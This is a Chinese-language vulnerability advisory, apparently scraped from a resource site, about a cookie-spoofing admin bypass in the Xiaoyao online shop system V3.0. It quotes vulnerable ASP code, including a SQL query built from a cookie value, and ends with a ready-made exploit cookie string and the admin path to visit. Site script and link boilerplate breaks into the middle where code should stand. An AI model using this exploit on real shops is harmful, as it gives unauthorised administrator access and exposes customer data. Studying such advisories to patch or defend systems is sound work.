正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警 -电脑资料

    OK开始，这是一个网店，本来我想先找注入，貌似注入都过滤了，

正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警

    漏洞文件：checkadmin.asp

    <%

    if request.cookies("buyok")("admin")="" then response.write ""

    %>

    大家看到这里一定以为很简单吧，呵呵 直接COOKIE欺骗就可以进后台，如果真的这样我就不发了~！留个悬念让大家去试试。

    然后我进入后台，http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。

    index.asp

   

    </p><p>&nbsp; &nbsp; <body topmargin="0" leftmargin="0"></p><p>&nbsp; &nbsp; <p>此网页使用了框架，但您的浏览器不支持框架，<h4><a href='https://www.unjs.com/ziliaoku/dn/' title="电脑资料">电脑资料</a></h4>《<a href='https://www.unjs.com/ziliaoku/dn/198186.html' title="正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警">正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警</a>》(<a href='https://www.unjs.com/' title="https://www.unjs.com">https://www.unjs.com</a>)。</p></p><p>&nbsp; &nbsp; <script src="https://www.unjs.com/static/js/jquery/1.9.1/jquery.min.js"></script> <script type="text/javascript"> if((navigator.userAgent.match(/(phone|pad|pod|mobile|ios|android|BlackBerry|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|symbian|transcoder)/i))){ document.write('<script type="text/javascript" src="https://js.9136.com/cpt/cptm.js?'+RAND_STR+'" charset="utf-8"><\/script>'); } else { document.write('<script type="text/javascript" src="https://js.9136.com/cpt/cpt.js?'+RAND_STR+'" charset="utf-8"><\/script>'); } </script> </body></p><p>&nbsp; &nbsp;

    看到这里我奇怪了，是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。

    继续跟进。代码就不发了免得多，最后发现了一个文件。

    漏洞文件：include\buyok_functions.asp

    下面贴出部分代码：

    set rscheck=conn.execute("select * from buyok_user where UserId='"&request.cookies("buyok")("userid")&"'")

    if rscheck.eof and rscheck.bof then

    response.write ""

    response.end

    看到这里大家都懂了吧 呵呵~！

    OK附上EXP：

    KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;

    修改COOKIE 然后直接进入http://127.0.0.1/admin/index.asp.

    后台：http://localhost/admin/login.asp

    作者：风之传说